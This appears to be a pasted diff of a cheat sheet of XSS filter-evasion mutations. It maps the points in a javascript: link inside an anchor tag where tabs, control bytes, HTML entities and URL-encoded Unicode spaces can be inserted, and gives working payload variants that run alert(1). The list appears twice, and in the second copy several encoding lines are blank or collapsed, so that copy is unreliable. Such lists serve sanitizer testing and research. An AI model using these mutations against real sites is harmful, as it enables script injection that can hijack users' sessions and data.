Lamber-maybe · February 14, 2023 07:40
diff --git a/mutation_a.txt b/mutation_a.txt
 <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

 [1]
 Bytes: 
 \x09 \x0a \x0c \x0d \x20 \x2f

 <a/href="javascript:alert(1)">
 <a\x09href="javascript:alert(1)">

 [2,3]
 Bytes: 
 \x09 \x0a \x0c \x0d \x20

 <a href\x20="javascript:alert(1)">
 <a href=\x20"javascript:alert(1)">

 [4]
 Bytes: 
 \x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20 

 HTML Encoding:
 &#x01; &#x02; &#x03; &#x04; &#x05; &#x06; &#x07; &#x08; &#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x0e; &#x0f; &#x10; &#x11; &#x12; &#x13; &#x14; &#x15; &#x16; &#x17; &#x18; &#x19; &#x1a; &#x1b; &#x1c; &#x1d; &#x1e; &#x1f; &#x20;

 <a href="&Tab;javascript:alert(1)">
 <a href="&#x001;javascript:alert(1)">

 [5]
 Bytes: 
 \x09 \x0a \x0d

 HTML Encoding:
 &#x09; &#x0a; &#x0d;

 <a href="javas\x09cript:alert(1)">
 <a href="javas&Tab;cript:alert(1)">

 [6]
 Bytes:
 \x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0 

 URL Encode (bytes):
 %09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0 

 HTML Encode (bytes):
 &#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x20; &#x21; &#x2b; &#x2d; &#x3b; &#x7e; &#xa0; 

 UTF-8 Symbols:
 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff

 URL Encode (UTF-8):
 %e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf

 HTML Encode (UTF-8):
 &#x1680; &#x2000; &#x2001; &#x2002; &#x2003; &#x2004; &#x2005; &#x2006; &#x2007; &#x2008; &#x2009; &#x200a; &#x2028; &#x2029; &#x202f; &#x205f; &#x3000; &#xfeff

 <a href="javascript:~alert(1)">
 <a href="javascript://%0d%0aalert(1)">
 <a href="javascript:\x0calert(1)">
 <a href="javascript:%ef%bb%bfalert(1)">
 <a href="javascript:&#xfeff;alert(1)">


 -----------------------------------------
 We use char codes to show non printable symbols
 \x00 - ASCII hex code
 \x20 - SPACE
 \x0a - NEW LINE

 \u0000 - UTF-8 char code  
 \u1680 - OGHAM SPACE MARK 
 \u2028 - LINE SEPARATOR

 Encoding UTF-8 to URL isn’t obvious:
 \u1680 -> %e1%9a%80
 \u2028 -> %e2%80%a8
	<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

	[1]
	Bytes:
	\x09 \x0a \x0c \x0d \x20 \x2f

	<a/href="javascript:alert(1)">
	<a\x09href="javascript:alert(1)">

	[2,3]
	Bytes:
	\x09 \x0a \x0c \x0d \x20

	<a href\x20="javascript:alert(1)">
	<a href=\x20"javascript:alert(1)">

	[4]
	Bytes:
	\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20

	HTML Encoding:


	<a href="&Tab;javascript:alert(1)">
	<a href="javascript:alert(1)">

	[5]
	Bytes:
	\x09 \x0a \x0d

	HTML Encoding:


	<a href="javas\x09cript:alert(1)">
	<a href="javas&Tab;cript:alert(1)">

	[6]
	Bytes:
	\x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0

	URL Encode (bytes):
	%09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0

	HTML Encode (bytes):
	! + - ; ~

	UTF-8 Symbols:
	\u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff

	URL Encode (UTF-8):
	%e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf

	HTML Encode (UTF-8):
	&#xfeff

	<a href="javascript:~alert(1)">
	<a href="javascript://%0d%0aalert(1)">
	<a href="javascript:\x0calert(1)">
	<a href="javascript:%ef%bb%bfalert(1)">
	<a href="javascript:alert(1)">


	-----------------------------------------
	We use char codes to show non printable symbols
	\x00 - ASCII hex code
	\x20 - SPACE
	\x0a - NEW LINE

	\u0000 - UTF-8 char code
	\u1680 - OGHAM SPACE MARK
	\u2028 - LINE SEPARATOR

	Encoding UTF-8 to URL isn’t obvious:
	\u1680 -> %e1%9a%80
	\u2028 -> %e2%80%a8